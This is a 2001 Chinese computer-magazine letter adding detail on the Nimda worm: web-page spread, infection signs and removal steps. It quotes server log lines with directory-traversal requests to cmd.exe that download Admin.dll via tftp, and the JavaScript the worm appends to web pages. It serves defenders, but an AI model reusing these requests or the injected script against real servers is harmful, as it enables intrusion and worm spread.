《谨防“尼姆达”蠕虫病毒》一文的补充

赵学华 
2001年 44期

　　2001年《电脑报》39期的《谨防“尼姆达”蠕虫病毒》一文，我认为应做以下补充，不但要从传播方式上注意，还要特别注意其他的特征。
　　　　传播方式，除了文章所说的外，还有一种方式是通过网页传播，这是很多网友不注意的地方，也是网络管理员不注意的地方。因为在点击网页时，会自动开启一个新窗口，而此窗口中所引用的文件就是一个以邮件方式存盘的文件，即以eml为扩展名的，且这个窗口是不能够最大化的。
　　　　病毒特征，除了文章讲的外还有以下特征:
　　　　1.日志文件
　　　　GET，/scripts/..\../winnt/system32/cmd.exe，/c+dir
　　　　GET，/scripts/..\../winnt/system32/cmd.exe，/c+tftp -i IP地址 GET Admin.dll c:\Admin.dll
　　　　GET，/scripts/..\../winnt/system32/cmd.exe，/c+tftp -i IP地址 GET Admin.dll d:\Admin.dll
　　　　GET，/scripts/..\../winnt/system32/cmd.exe，/c+tftp -i IP地址 GET Admin.dll e:\Admin.dll
　　　　很简单，从这几行看，如果中了这个病毒，就会在硬盘分区的每个根目录中有Admin.dll。
　　　　2.网站被修改
　　　　如果点击网站时，出现不能最大化的窗口且是无法显示或无可显示的页面时，就得留意了，一般“尼姆达”蠕虫病毒如果感染的是服务器，会找到启动的页面，进行修改，在最后增加以下行:<html><script language="JavaScript"window.open（"readme.eml"，null，"resizable=no，top=6000，left=6000"）</script></html>。这样，只要你点击修改后的页面，病毒就会自动传染给你了。
　　　　3.在硬盘上留下的文件
　　　　除了Admin.dll（根目录下的）、Riched20.dll、readme.eml外，还在网站目录中存在*.nws和其他*.eml，像以DOS外部命令为名字.eml等。
　　　　解决方案:如果发现了病毒或怀疑中了病毒，不能按常规方式重新启动，如果不是服务器，重启动进入安全模式，是服务器则要以VGA方式启动，然后把Admin.dll和Riched20.dll删除，在常规启动方式这些文件下是不能删除的，如果用常规方式启动，会让硬盘上更多文件感染病毒。然后查找所有的*.eml和*.nws文件，如果是同一时间的文件，你立即删除掉，不管是什么文件名，大多除了readme.eml外就是DOS外部命令.eml了，如果上面的DLL没有被删除，在别人访问你的网站时就会自动把这两个DLL传送到别人的服务器上，如果readme.eml没有删除，就会被修改后的页面启动，使病毒得以传播。因此在网站目录中的eml文件，不要轻易点击，如果点击它，它就会立即消失掉，给清除带来很大困难。
　　 
 